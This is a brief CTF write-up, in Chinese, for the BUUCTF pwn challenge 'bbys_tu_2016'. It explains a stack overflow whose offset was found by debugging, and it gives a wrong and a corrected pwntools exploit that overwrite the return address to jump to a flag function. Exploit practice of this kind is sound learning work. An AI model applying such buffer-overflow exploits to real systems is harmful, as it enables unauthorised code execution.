[BUUCTF-pwn]——bbys_tu_2016
简单的栈溢出,不过竟然是esp寻址,害的孩子找了好久还是要动态调试 一般地址会误差八个字节
error exploit
from pwn import *
#p = remote('node3.buuoj.cn',28360)
p = process('./bbys_tu_2016')
gdb.attach(p, "b *0x080485ED")
flag = 0x0804856D
payload = 'a' * (0xc + 4) + p32(flag)
p.sendline(payload)
p.interactive()
right exploit
from pwn import *
#p = remote('node3.buuoj.cn',28360)
p = process('./bbys_tu_2016')
gdb.attach(p, "b *0x080485ED")
flag = 0x0804856D
payload = 'a' * (0x14 + 4) + p32(flag)
p.sendline(payload)
p.interactive()